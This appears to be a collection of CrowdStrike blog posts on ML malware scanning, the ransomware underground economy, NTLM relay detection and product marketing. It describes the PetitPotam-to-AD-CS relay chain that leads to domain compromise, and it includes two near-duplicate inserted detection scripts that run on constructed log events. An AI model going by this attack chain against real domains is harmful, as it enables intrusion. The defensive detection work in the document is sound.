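    StoredFile("hash-E", [1.2, 0.3, 0.5], prevalence=250, label=None),      # unlabeled detection
]

if __name__ == "__main__":
    r = virtual_scan(SAMPLE_FILES, WEIGHTS, BIAS)
    print(r)
    print("release within budget:", release_gate(r, max_weighted_fp_cost=1000))
```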

Again, returning to the rain example, this virtual scan is like checking multiple weather forecasting websites as soon as we have the two signs — cloudy and damp — before leaving the house with or without an umbrella. Some of those websites may be correct in predicting rain, others may not, but the next time it’s cloudy and damp we will know which websites are reliable before we go outside and risk being caught in the rain without an umbrella.

CrowdStrike’s Automated Cloud-Based Machine Learning Model Maximizes Efficacy

While CrowdStrike analysts inspect millions of files, the number of files detected as malicious is small enough that they can be analyzed by hand. Because our analysts and processes work better on samples that we have instead of information about samples, we start our analysis with those detections we can also find in our massive sample store. 

Using feature vectors, the Falcon platform enables us to know quite a bit about the files we don’t have, and also allows us to use the power of the cloud to enhance detection or resolve incorrect detections of files not contained in our sample store.

Comparing global virtual scans of prevalent files against all of our static detection models is critical in pushing the accuracy and efficacy of our machine learning models to help secure our customers and stop breaches.

In essence, the power of the Falcon platform lies in its ability to take full advantage of the massive data fabric we call the CrowdStrike Security Cloud, which correlates trillions of security events from protected endpoints with threat intelligence and enterprise telemetry. The Falcon platform uses machine learning and AI to automate and maximize the efficacy of detecting and protecting against threats, to stop breaches.

Additional Resources

  • Find out more about machine learning and the power of the CrowdStrike Security Cloud at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn more about the CrowdStrike Falcon® platform by visiting the product webpage.
  • Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.

Tales from the Dark Web: How Tracking eCrime’s Underground Economy Improves Defenses

30 June 2022 at 19:46

Cybercriminals are constantly evolving their operations, the methods they use to breach an organization’s defenses and their tactics for monetizing their efforts. 

In the CrowdStrike 2022 Global Threat Report, we examined how the frequency and sophistication of ransomware attacks has grown in the past year. CrowdStrike Intelligence observed an 82% increase in ransomware-related data leaks in 2021 compared with 2020; further, we found 62% of attacks use hands-on-keyboard activity — indicating adversaries continuously advance their tradecraft to bypass legacy security solutions and extort victims via highly targeted data leaks. What are the forces driving this growth, and how exactly do cybercriminals make money?

The Fast-Growing, Lucrative Business Model Enabled by RaaS

Ransomware is not new; adversarial groups have relied on compromises for many years. However, over the past 2-3 years, their strategy has started to shift toward a more community-based business model enabled by ransomware-as-a-service (RaaS) platforms that allow smaller, less advanced criminals to join a larger operation. 

At the top of this model is an operator who sets up a RaaS platform that takes care of multiple technical tasks such as on-demand ransomware packaging, command and control of deployed ransomware, cryptography, data extraction, archiving, online extortion and others. 

Less sophisticated cybercriminals with minimal hacking knowledge can join this operation after being vetted; when they do, they’ll receive 70 to 80% of the paid ransom. These emerging criminals are also assisted by access brokers, through which they can acquire access to the infrastructure of a potential victim. The interaction between all these criminal entities — RaaS operators, vetted affiliates, access brokers and other participants — happens via criminal forums, underground markets and anonymous posts. CrowdStrike continuously monitors these environments, and users may receive alerts regarding market and forum activity.

Access Brokers: How Adversaries Get In

The eCrime kill chain is often enabled by access brokers, the intruders who gain access to an organization’s infrastructure and then sell illicitly obtained credentials and other access methods to buyers in underground communities.

Adversaries buy compromised credentials to make the process of getting into a target organization easier and more efficient. Access brokers sell a broad range of access types, including financial account logins, business email account credentials, remote access to network assets and custom exploits for IT infrastructure.

To advertise compromised credentials and other access methods on the underground, access brokers use particular keywords and target specific marketplaces. However, their posts often leave behind “breadcrumbs” that offer defenders an opportunity to detect compromised accounts or risks of security incidents. For example, an access broker may include attributes such as company details (size, revenue, industry), IT infrastructure details, the malware used to steal credentials, or the access broker’s alias.

The amount of chatter on underground forums is massive. CrowdStrike’s managed service, Falcon X Recon+ provides security teams assistance by offering custom expertise to monitor and triage threats found in these forums on your behalf. CrowdStrike experts can guide organizations of all sizes to identify unwanted data exposure or threats like account takeovers and brand-targeted attacks. 

Distribution Services: A Force Driving Ransomware

CrowdStrike’s analysis of ransomware campaigns by groups such as Pinchy Spider, also known as REvil, Wizard Spider (Conti) and Carbon Spider (DarkSide) has made it clear the operators behind these campaigns no longer work alone, in particular when compromising assets and injecting the ransomware. Ransomware operators advertise on underground forums to recruit affiliates who can help them distribute ransomware and share the profits. 

These affiliates leverage RaaS infrastructure from the operators. After targeting and compromising a victim’s assets, they drop ransomware from the RaaS platform, set the ransom demand and get 70 to 80% of the ransom payment in return. Victims are often chosen based on the likelihood they’ll be able to afford a ransom; affiliates often calculate ransom payouts based on company revenue and business impact to maximize their profits. 

Operators provide technical services in return for affiliates’ help in distributing ransomware. They may provide a packager to generate customized ransomware so affiliates can distribute over their own channels; cryptographic key management; or internet infrastructure for data exfiltration and storage. They may share payment instructions to receive virtual currencies from victims; secret communication channels to hide affiliates when they talk to victims; and even a help desk to aid victims in paying the ransom. These services give a boost to less tech-savvy adversaries, who benefit from access to technically advanced malware at low cost. 

CrowdStrike Intelligence analysts found multiple initial access and lateral movement techniques that affiliates use before deploying ransomware. By changing how they distribute ransomware, adversaries can find new ways to bypass security measures. Below are a few examples of how attackers gain initial access:

  • Buying stolen credentials from access brokers. Affiliates often use legitimate credentials to gain a foothold. Remote Desktop Protocol (RDP) is a popular entryway.
  • Spam or social engineering. Among the most common initial access vectors.
  • Vulnerability scanning and exploit kits. These kits can be found on multiple forums and target specific software or systems to gain access and install additional code. Exploit kits can be combined with phishing campaigns to boost their effectiveness.
  • Loader and botnet usage. Loaders, often a step between phishing campaigns and ransomware deployment, use malicious documents like macro-enabled spreadsheets to download and execute malicious code.
  • Post-exploitation tools and “living off the land.” Adversaries that access a system will explore the network to find critical data or applications that can help further an attack. Some use system tools like PSExec or PowerShell scripts to remain hidden.

A better understanding of adversary techniques can help improve your defenses. Organizations must know which attackers are targeting their region or industry, whether they are recruiting affiliates, and how their ransomware is distributed. By understanding the adversary and their tools, defenders can employ an intelligence-first defense strategy based on the threats they face.

Monetization: How Cybercrime Pays

Once ransomware is deployed into a victim environment, the prize needs to be split and monetized into other payment forms. CrowdStrike’s observations of the cybercrime ecosystem offer new insights into adversaries, their transactions and valuation of recent compromises — all of which can help defenders understand how money flows in cybercrime and strengthen their security strategies.

Adversaries constantly evolve their monetization techniques to maximize the chance of payment. Their methods are working: reports from the U.S. Treasury Department’s Financial Crimes Enforcement Network (FinCen) and the Office of Foreign Assets Control (OFAC) underscore how lucrative ransomware has become. FinCen found the value of suspicious activity detailed in ransomware-related suspicious activity reports (SARs) was $590 million USD in the first six months of 2021 — far higher than the $416 million USD reported in all of 2020. Further, CrowdStrike’s Intelligence team also tracks ransomware demands: in 2021, we calculated an average demand of $6.1 million USD, an increase of 36% from 2020. 

If a victim refuses to pay ransom, their data may be auctioned by the threat actor so they can still make money on it by selling it to other parties or adversaries.

Corporate data is valuable to all adversaries. Once they have it, the data can be easily monetized and present increased risk to your organization if other attackers have access to it. Defenders must develop a stronger understanding of cybercriminals’ behavior — and the broader eCrime ecosystem — in order to make smarter security decisions that best protect data as their most valuable asset.

In the “Tales from the Dark Web” white paper series, we explore the increased specialization of adversaries inside the criminal underground. This includes the changing tradecraft for gaining initial access, achieving lateral movement, exfiltrating data and leveraging it to extort their targets. By understanding how adversaries specialize in these critical areas to gain scale and efficiency, organizations can better prepare their defenses. 

Rather than simply illustrate the problems defenders face, the insights from these white papers will arm security teams with actionable information, enabling them to better prepare for the attacks emerging from the criminal underground. 

Detecting and Mitigating NTLM Relay Attacks Targeting Microsoft Domain Controllers

29 June 2022 at 18:52

Adversaries often exploit legacy protocols like Windows NTLM that unfortunately remain widely deployed despite known vulnerabilities. Previous CrowdStrike blog posts have covered critical vulnerabilities in NTLM that allow remote code execution and other NTLM attacks where attackers could exploit vulnerabilities to bypass MIC (Message Integrity Code) protection, session signing and EPA (Enhanced Protection for Authentication).

The PetitPotam vulnerability, combined with AD-CS relay, is one of the most severe recent NTLM relay variations, and the CrowdStrike Identity Protection research team has seen it used frequently, which indicates its high popularity. While the latest Microsoft security update — released on Patch Tuesday, May 10, 2022 — included a patch for the aforementioned vulnerability, it does not fully mitigate the issue. It does, however, change the requirements from being able to run the attack unauthenticated to requiring any Active Directory account credentials to trigger the attack. 

In this blog, we detail the fix, the remaining issues and an enhancement to Falcon Identity Protection’s existing NTLM relay detection, which detects exploitation of the PetitPotam vulnerability and similar authentication coercion techniques.  

PetitPotam and NTLM Relay

NTLM relay has always been a popular attack technique. In the past, the biggest challenge was to solicit a user account to authenticate to an attacker-controlled machine; now it seems that endpoint authentication coercion mechanisms are gaining popularity. 

The most popular targets, for obvious reasons, are domain controllers, as their high privileges make them a lucrative target for authentication relay attacks. The first authentication coercion mechanism involved the Print Spooler service, while the newer one relies on the MS-EFSRPC protocol. The latter is also known as the PetitPotam attack. When combined with the insecure default configuration of the Active Directory Certificate Services (AD-CS), which does not enforce Extended Protection for Authentication (EPA), it could be deadly as it can lead to a full domain compromise in a few steps. An attacker could trigger a domain controller authentication by exploiting the PetitPotam vulnerability and relaying it to the AD-CS server to request a certificate for the domain controller account. Using this certificate, a malicious actor can then retrieve a TGT for the relayed domain controller account and perform any further operations using its high privileges (e.g., dump domain admin hashes). 

One of the most severe issues with the PetitPotam vulnerability, prior to Microsoft’s latest security updates, was that an attacker could run the attack unauthenticated (i.e., only network access to the domain controller was required). The patch only partially mitigates the issue, meaning an attack is still possible.

The Released Fix(es) and Remaining Issues

The Microsoft security update released on Patch Tuesday, May 10, 2022, included a partial patch for the PetitPotam vulnerability. This update, however, also caused authentication failures for various Windows services such as Network Policy Server (NPS), Routing and Remote Access Service (RRAS), Radius, Extensible Authentication Protocol (EAP) and Protected Extensible Authentication Protocol (PEAP). According to Microsoft, “An issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller.” 

As a workaround, Microsoft recommended to manually map certificates to Active Directory accounts or follow KB5014754 for other possible mitigations. Because of the issues caused by the patch, CISA warned against deploying it on domain controllers, which left many organizations wide open to the unauthenticated PetitPotam authentication coercion attack. On May 19, 2022, an out-of-band update was made available to fix the authentication failures caused by the latest security update.

It is important to note that the security update states, “This security update detects anonymous connection attempts in LSARPC and disallows it,” which leaves the question: Does the coercion attack still work using an authenticated user?

Following some testing, it looks like the answer is yes!

While the PetitPotam vulnerability, when patched, will no longer work unauthenticated, it can still be abused by leveraging any Active Directory account credentials to trigger domain controller NTLM authentication, which can be relayed to escalate to domain admin privileges if the required security settings are not enforced (as previously mentioned, EPA is not enforced by default on AD-CS servers).

Moreover, PetitPotam is no longer the newest authentication coercion method; the attack tool DFSCoerce, which abuses the MS-DFSNM protocol to trigger domain controller authentication, has since been released. 

Enhancing CrowdStrike Identity Protection NTLM Relay Detection

Because an authenticated user can still trigger an NTLM authentication from the domain controller, the NTLM relay attack vector remains relevant for domain controller accounts. This is why the NTLM relay detection capability of CrowdStrike Falcon Identity Threat Protection was enhanced to detect attempts to perform NTLM relay using domain controller credentials. The benefit of this detection is that it is not tied to any single authentication coercion method, but will detect a relay attack no matter if it is initiated by the PetitPotam vulnerability, the newer DFSCoerce tool or any coercion mechanism discovered in the future.
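The detection idea in this paragraph, as an added illustration (example code, not Falcon Identity Threat Protection's own logic): whatever coercion method is used, the relay target sees an inbound NTLM network logon for a domain controller machine account that originates from a host that is not that domain controller. The rule below runs over constructed Windows Security event 4624 records flattened into key=value text; the DC inventory, host names and addresses are assumptions made for the example.

```python
"""Flag inbound NTLM network logons presenting a domain controller machine
account from a source that is not that domain controller.

Added example, not CrowdStrike's detection logic. A coerced DC authenticates
outbound to the relay host, which forwards that NTLM authentication to its
target (for example an AD-CS server). The target's Security log then records a
4624 logon for DC01$ whose source address is the relay host, not DC01. All
inventory, hosts, addresses and events below are constructed.
"""
from typing import Dict, List, Set

# Constructed inventory: DC machine accounts and the addresses they legitimately use.
DC_ADDRESSES: Dict[str, Set[str]] = {
    "DC01$": {"10.0.0.10"},
    "DC02$": {"10.0.0.11"},
}

# Constructed 4624 events. Field names follow the event's EventData; "Computer"
# stands in for the System-section host that logged the event.
SAMPLE_EVENTS = [
    # DC01 authenticating to the CA from its own address: expected traffic.
    "EventID=4624 Computer=CA01.corp.example LogonType=3 AuthenticationPackageName=NTLM "
    "TargetUserName=DC01$ TargetDomainName=CORP IpAddress=10.0.0.10 WorkstationName=DC01",
    # DC01's credentials arriving at the CA from a workstation subnet: relay pattern.
    "EventID=4624 Computer=CA01.corp.example LogonType=3 AuthenticationPackageName=NTLM "
    "TargetUserName=DC01$ TargetDomainName=CORP IpAddress=10.0.5.77 WorkstationName=WS-RELAY",
    # Kerberos logon for the same account: not an NTLM relay.
    "EventID=4624 Computer=CA01.corp.example LogonType=3 AuthenticationPackageName=Kerberos "
    "TargetUserName=DC01$ TargetDomainName=CORP IpAddress=10.0.5.77 WorkstationName=-",
    # Ordinary user over NTLM: out of scope for this rule.
    "EventID=4624 Computer=FS01.corp.example LogonType=3 AuthenticationPackageName=NTLM "
    "TargetUserName=jdoe TargetDomainName=CORP IpAddress=10.0.5.77 WorkstationName=WS-0042",
    # DC account over NTLM with no usable source address: cannot be verified, so report it.
    "EventID=4624 Computer=FS01.corp.example LogonType=3 AuthenticationPackageName=NTLM "
    "TargetUserName=DC02$ TargetDomainName=CORP IpAddress=- WorkstationName=-",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened key=value event line into a dictionary."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def classify(ev: Dict[str, str]) -> str:
    """Return a finding reason, or "" when the event does not match the relay pattern."""
    if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
        return ""                       # only successful network logons are relay candidates
    if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
        return ""                       # Kerberos tickets are not relayed this way
    account = ev.get("TargetUserName", "").upper()
    if account not in DC_ADDRESSES:
        return ""                       # only domain controller machine accounts
    logging_host = ev.get("Computer", "").split(".")[0].upper() + "$"
    if logging_host == account:
        return ""                       # a DC's own local logons are not relay traffic
    source = ev.get("IpAddress", "-")
    if source in ("-", ""):
        return "DC account over NTLM with no verifiable source address"
    if source not in DC_ADDRESSES[account]:
        return "DC account over NTLM from a non-DC source address"
    return ""


def find_relay_candidates(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over raw event lines and collect findings for an analyst."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reason = classify(ev)
        if reason:
            findings.append({
                "account": ev["TargetUserName"],
                "source": ev.get("IpAddress", "-"),
                "target": ev.get("Computer", "?"),
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for finding in find_relay_candidates(SAMPLE_EVENTS):
        print(finding)
```

On real telemetry, correlating a finding with the coerced DC's outbound authentication raises confidence, and a DC presenting NTLM even from its own address is worth a look, since domain controllers should be using Kerberos between themselves and the CA.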

Watch this video on Falcon Spotlight™ to see how you can monitor and prioritize NTLM relay issues and other vulnerabilities within your environment, and this video to learn how Falcon Identity Threat Protection helps ensure comprehensive protection against identity-based attacks in real time.

Additional Mitigations

Though patching is an important first step against the latest NTLM relay vulnerabilities, it is not enough, as many unsecured defaults can leave your domain vulnerable. This is why we recommend following these steps:

  1. Enforce Signing (SMB/LDAP) and Extended Protection for Authentication (EPA) for all relevant servers, especially the AD-CS servers, which are a common target of this attack.
  2. Track any failed/successful NTLM relay attempts performed in your domain network. Using the enhanced detection capabilities of the CrowdStrike Falcon Identity Threat Protection, customers can now be alerted on NTLM relay attacks abusing domain controller accounts.
  3. Disable NTLM. Because this is a potentially breaking change that requires a lot of time in most environments, start by disabling NTLM support on servers that may be targeted during a relay attack and are not sufficiently protected. For example, if for any reason you are unable to enforce EPA on the AD-CS server, disable incoming NTLM on that server to protect it from NTLM relay attacks.
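The core of step 2 is a simple question: is a domain controller's machine account being presented over NTLM from somewhere other than that domain controller? The script below is an added example, not CrowdStrike code (the Falcon detection itself is proprietary); it applies that heuristic to a handful of Windows Security event 4624 records. The DC inventory, host names, addresses and events are constructed for the example.

```python
"""Flag NTLM network logons that present a domain controller's machine
account from an address that is not that domain controller.

Added example, not CrowdStrike code. A coerced DC authentication that is
relayed shows up at the target (for instance the AD CS host) with the relay
host's address, not the DC's own, which is what this heuristic looks for.
The inventory, hosts, addresses and events below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class LogonEvent:
    """The event 4624 fields the heuristic needs."""
    target_user: str   # TargetUserName, e.g. "DC01$" for a machine account
    logon_type: int    # LogonType; 3 is a network logon
    auth_package: str  # AuthenticationPackageName: "NTLM" or "Kerberos"
    source_ip: str     # IpAddress: where the authentication came from
    target_host: str   # computer that logged the event (the host logged on to)


# Constructed inventory (assumption): DC name -> the address it authenticates from.
DC_INVENTORY: Dict[str, str] = {"DC01": "10.0.0.10", "DC02": "10.0.0.11"}


def dc_name(account: str) -> str:
    """Return the DC name for a DC machine account ("DC01$" -> "DC01"), else ""."""
    if not account.endswith("$"):
        return ""
    name = account[:-1].upper()
    return name if name in DC_INVENTORY else ""


def relay_suspects(events: Iterable[LogonEvent]) -> List[LogonEvent]:
    """Return NTLM network logons of a DC account that did not originate at that DC."""
    suspects: List[LogonEvent] = []
    for ev in events:
        if ev.logon_type != 3 or ev.auth_package.upper() != "NTLM":
            continue
        name = dc_name(ev.target_user)
        if name and ev.source_ip != DC_INVENTORY[name]:
            suspects.append(ev)
    return suspects


# Constructed sample: one DC01$ NTLM logon at the CA host that did not come from DC01.
SAMPLE_EVENTS = [
    LogonEvent("DC01$", 3, "Kerberos", "10.0.0.10", "FS01"),  # Kerberos: out of scope
    LogonEvent("DC01$", 3, "NTLM", "10.0.0.10", "FS01"),      # NTLM, but from DC01 itself
    LogonEvent("alice", 3, "NTLM", "10.0.0.77", "CA01"),      # user account, not a DC
    LogonEvent("WS07$", 3, "NTLM", "10.0.0.77", "CA01"),      # workstation account
    LogonEvent("DC01$", 3, "NTLM", "10.0.0.77", "CA01"),      # DC01$ presented from 10.0.0.77
    LogonEvent("DC02$", 3, "NTLM", "10.0.0.11", "CA01"),      # DC02 from its own address
]

if __name__ == "__main__":
    for ev in relay_suspects(SAMPLE_EVENTS):
        print(f"possible NTLM relay: {ev.target_user} from {ev.source_ip} "
              f"logged on to {ev.target_host}")
```

Treat a hit as one signal to correlate rather than a verdict: a DC with several addresses or interfaces needs every address in the inventory, and the host that originally triggered the DC authentication is worth pulling in when the telemetry has it. The preventive control is still step 1; signing and EPA make the relayed authentication useless even when this check fires.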

Additional Resources

  • Learn more about popular attack techniques at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn how CrowdStrike Falcon Identity Protection reduces costs and risks across the enterprise by protecting workforce identities.
  • Watch this video to see how Falcon Identity Threat Protection detects and stops ransomware attacks.
  • Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV performs against today’s most sophisticated threats.

Falcon OverWatch Elite in Action: Tailored Threat Hunting Services Provide Individualized Care and Support

29 June 2022 at 18:35

The threat presented by today’s adversaries is as pervasive as it is dangerous — eCrime and state-nexus actors alike are attempting to infiltrate companies and organizations of all sizes and across all verticals. 

While technology is a powerful tool for performing routine or repeatable analysis, the only way to effectively hunt and contain sophisticated and determined cyber threat actors is to use the expertise and ingenuity of human threat hunters.

The Telescope and the Microscope: Two Sides of the Threat Hunting Coin 

Threat hunting is an ever-evolving discipline that proactively tracks changes in adversaries’ behavior. It requires a broad awareness of the threat landscape — the telescopic view — and can be augmented by a deeper understanding of a customer’s pain points or areas of identified risk — the microscopic view. The most comprehensive threat hunting leverages both the telescopic and microscopic viewpoints, blending the insights gained from both perspectives to safeguard a customer’s assets from threats.

The CrowdStrike Falcon OverWatch™ team’s continuous hunting operations are driven by a world-class team of dedicated in-house threat hunters — individuals who are relentlessly committed to honing their craft and dedicated to the mission of stopping breaches. OverWatch analysts track the most stealthy and persistent hands-on-keyboard campaigns, actively hunting for that last 1% of malicious activity deliberately seeking to subvert technology-based controls. 

Using patented hunting tools, OverWatch hunters leverage the power of the CrowdStrike Security Cloud to hunt across in excess of one trillion events a day — proactively searching for that malicious activity designed to blend in with the benign. Given the sheer breadth of information available to them, OverWatch analysts are skilled at identifying even the faintest signs of activity indicative of threat actor behavior and emerging threats, enabling customers to rapidly disrupt malicious behavior before its impact is felt.

The Power of Elite Tailored Threat Hunting

For organizations that are looking for an active partnership with their hunters, CrowdStrike offers OverWatch Elite — the personalized customer engagement add-on for CrowdStrike’s Falcon OverWatch managed threat hunting service.

OverWatch Elite builds on the continuous 24/7 human-led threat hunting provided by OverWatch, leveraging the ability to hunt across global telemetry to address areas of concern identified by customers. OverWatch Elite customers have access to an assigned threat analyst who provides a range of services to drive improved maturity across a customer’s internal security team. These services include expert coaching to support any in-house hunting efforts, regular threat updates, and a dedicated line of communication to address any queries or concerns as they arise. In partnership with their assigned analyst, customers can develop, operationalize and tune their threat hunting programs to ensure that supplementary threat hunts are tailored to their needs.

OverWatch Elite analysts build close partnerships with their assigned customers to develop a shared understanding of an organization’s unique structure and requirements. OverWatch Elite analysts are then able to tune their tools to the particular nuances found within a customer’s environment. In addition to addressing the customer’s needs, this fine-tuning enables all OverWatch analysts to more easily identify hands-on-keyboard activity and respond promptly to potential threats. 

The fast, closed-loop communication between customers and the OverWatch Elite team allows for greater collaboration to address issues. Whether a customer has seen the news about a recent vulnerability or read an intelligence report about certain threat actors targeting companies in their sector, assigned analysts are available to listen and respond to these concerns by performing threat hunts tailored to address them.

Working Better Together

It is important to recognize that these two parts of OverWatch share a common mission: stopping breaches. OverWatch and OverWatch Elite analysts work hand-in-hand daily to ensure all customers are protected against those malicious hands-on-keyboard activities designed to evade detection. All teams under the OverWatch umbrella work together continuously to provide the best customer service possible. 

OverWatch Elite Manager Gareth Willams puts it best: “You can’t look at the moon with a microscope and you can’t use a telescope to see small objects, but both give you a great field of vision.” 

In addition to tailored threat hunting services, OverWatch Elite offers several additional features that truly make this a customer engagement-centric managed threat hunting service. Additional offerings include 60-minute call escalation for critical threats, which provides OverWatch Elite customers added peace of mind when it comes to rapidly disrupting adversary activity within their environments. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

For more information, please visit OverWatch Elite’s page on CrowdStrike’s website.

CrowdStrike Falcon Pro for Mac Achieves 100% Mac Malware Protection, Wins Fifth AV-Comparatives Approved Mac Security Product Award

28 June 2022 at 07:28
  • CrowdStrike Falcon Pro for Mac achieved 100% Mac malware protection in the May 2022 AV-Comparatives Mac Security Test and Review 
  • CrowdStrike Falcon Pro for Mac has now won five consecutive Approved Mac Security Product Awards from AV-Comparatives, one of the leading third-party independent organizations testing the efficacy of endpoint security solutions in protecting against malware
  • CrowdStrike Falcon Pro for Mac uses cloud-based and on-sensor machine learning to proactively protect against threats

CrowdStrike believes that continuous testing and evaluation by third-party organizations is critical in helping customers make informed decisions about which security solution best fits their needs. This is why CrowdStrike continues to participate in more third-party testing than any other next-gen endpoint cybersecurity vendor.

We’re proud to announce the results of the latest evaluation: CrowdStrike achieved the highest Mac malware protection score in the May 2022 AV-Comparatives Mac Security Test and Review, scoring 100% Mac malware protection with Falcon Pro for Mac. This marks the fifth consecutive time that CrowdStrike has won the Approved Security Product Award.

One of the leading third-party independent testing organizations, AV-Comparatives evaluated the efficacy of 10 endpoint security products in detecting 471 recent and representative malicious Mac samples collected during the first half of 2022. CrowdStrike Falcon Pro for Mac once again stood out against the competition, demonstrating the proactive capability to accurately detect and block new and unknown threats by using the power of cloud-based and on-sensor machine learning.

AV-Comparatives Testing Methodology

The Malware Protection Test part of the Mac Security Test and Review 2022 from AV-Comparatives assesses the efficacy of endpoint security vendors in detecting and protecting against recent macOS malware and threats that reflect the current threat landscape.

AV-Comparatives requires a high endpoint protection rate to win certification during the evaluation, as third-party endpoint security solutions for macOS are not always present. Because potential exposure to Mac malware could have serious consequences, it’s crucial that a security solution has high endpoint protection capabilities for the evaluation.

The Mac Security Test and Review 2022 also assessed endpoint detection capabilities for potentially unwanted applications (PUAs) for Mac, such as adware and bundled software that can disrupt system usability and performance. PUA testing also examined the ability to detect Windows malware on macOS, for while Windows malware is benign on macOS it may use Mac systems to reach Windows machines. The test involved 773 prevalent macOS PUA samples and 1,000 prevalent Windows malware samples.

How Falcon Pro for Mac Performed During Testing 

Falcon Pro for Mac uses a layered approach to protect endpoints from new and unknown malware and threats, employing both on-sensor and in-the-cloud machine learning capabilities coupled with behavior-based malware detection.

Throughout the Malware Protection Test, the CrowdStrike Falcon® sensor achieved 100% protection against all Mac malware samples, with zero misses on detecting macOS malware and threats that reflect the current threat landscape. Falcon Pro for Mac demonstrated excellent capability in instantly protecting endpoints from new and unknown malware as soon as it touched the system. 

While PUAs are not malicious per se, and Windows malware doesn’t execute on macOS — it’s completely inert — Falcon Pro for Mac detected 98% of Mac PUAs and 84% of Windows PUAs on macOS.

Fifth AV-Comparatives Approved Mac Security Product Award 

CrowdStrike remains committed to participating in independent tests from leading third-party organizations. The recent AV-Comparatives Approved Mac Security Product Award demonstrates our consistent excellent performance in protecting endpoints from macOS malware and threats and our ability to achieve public testing parity in protecting from both Windows and Mac malware and threats.

Winning the fifth consecutive Mac Security Product award from AV-Comparatives highlights the power of the Falcon platform in delivering machine learning-powered and layered endpoint security to drive continued leadership in protecting macOS systems.

CrowdStrike Tops IDC Worldwide Corporate Endpoint Security Market Shares, 2021

23 June 2022 at 14:44

CrowdStrike is proud to be ranked No. 1 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report (doc #US48580022, May 2022). We are grateful to our customers and partners for helping us achieve this significant milestone, yet its real value goes far beyond the bottom line. Our conviction is that the only way to stop modern adversaries is by using a best-in-class platform that leverages native artificial intelligence (AI), machine learning (ML) and automation to harness the power of high-fidelity data and front-line human expertise. 

Rich telemetry and threat intelligence form the foundation of nearly everything CrowdStrike does. It trains our AI and ML algorithms to make hyper-accurate decisions, gives our threat hunters and incident responders the context they need to root out and contain active attacks, informs intelligent automation across our platform, and empowers SecOps professionals with the visibility to simplify and accelerate detection, investigation and response workflows across their environment.

Unifying AI and Human Expertise to Stop Adversaries

Some AI experts argue that general purpose methods such as search and learning that leverage ever-increasing training sets and computing power are what primarily drive how machines can solve the most complex problems (e.g., beating an expert in the game of Go). You can think of this approach as teaching the algorithm how to think and learn (like a toddler learning how to play the game by watching their friends and then trying over and over until they get it right) rather than putting specific knowledge into it (like the same toddler being told over 200 possible moves and common strategies for gameplay and then left on their own to figure things out). 

Others would argue that simply adding more raw data and computing power isn’t enough, as human knowledge is critical to achieving a specific outcome (and to reducing the carbon footprint from unlimited computing). 

While this debate is sure to continue, let’s examine how CrowdStrike holistically blends both approaches — supervised and unsupervised — to achieve cloud-scale AI that is enriched with human-led expertise to solve one of the hardest challenges in IT: counteracting a malicious human on the other side of the keyboard.

High-Fidelity Data Is the Bedrock of Analytics

Every good decision in cybersecurity starts with good data, which must come from sensors deployed holistically across the enterprise. The more weak signals you can integrate into a strong signal, the better your chances are of finding the attack that matters most, which is one of the core philosophies behind CrowdStrike Falcon XDR. According to the IDC report, we owned “12.6% corporate endpoint security market in 2021,” leapfrogging all other providers and delivering significant year-over-year growth. Our growth means we have evermore sensors in the most critical, highly targeted organizations, resulting in more high-fidelity data for analytics.

By the numbers, CrowdStrike Threat Graph® processes trillions of security events per day from nearly 18,000 customers around the world. One of the secrets of AI, and the Threat Graph itself, is how the value of data compounds over time. The more high quality data you have over an extended time horizon, the faster and more accurate decisions you can make. As we’ve been categorizing indicators of attack (IOAs) and tactics, techniques and procedures (TTPs) for over a decade, chances are we’ve already seen a particular malicious behavior or something like it. This allows us to predict the right response in near real time. Whether the response is a prevention event or investigating, hunting or running forensics across our vast data repository, it results in better prevention rates and faster time to containment for our customers.

AI-powered Analytics Is Key to Stay Ahead of Evolving Adversaries

Of course, raw data isn’t valuable without analytics. As we’ve seen throughout the long history of security information and event management (SIEM) systems, more data can often be overwhelming, requiring vast resources to ingest, store, manage and transform raw telemetry into actionable insights. SIEMs are often referred to as “garbage collectors” for data — garbage data in equals garbage data out. The last thing we need in cybersecurity is more noise. The key is gathering and integrating the right data to fuel analytics, which never means all data.

Across the CrowdStrike Falcon® platform, we employ multiple complementary layers of AI/ML to our rich dataset to deliver accurate results, including our continuously learning malware prevention capabilities on the endpoint that can stop never-before-seen threats before they result in a breach. Additionally, with Falcon XDR, we apply analytics across disparate sources of security telemetry to surface hidden threats that could bypass traditional single-point detection tools. 

Another critical area of focus for analytics is the quality of the security analyst experience. CrowdStrike constantly finds ways to inject analytics into our platform to make the job of detecting, investigating and responding to events simpler and more effective. For instance, no analyst intervention is needed to build the complete visualization of an adversary’s complex attack path, saving hours and greatly reducing mean time to detect/mean time to respond (MTTD/MTTR); think of this like “autocomplete” in your email. 

CrowdStrike will continue to drive new innovations in the Falcon platform to take the hands-on grunt work out of security operations. One such example is the native integration of the CrowdStrike Falcon Fusion security orchestration and automation response (SOAR) solution into Falcon XDR, which allows analysts to focus on responding in a timely manner to the relatively few events that truly matter, the situations where responses can’t be fully automated.

Human-led Expertise Informs AI in a Virtuous Cycle

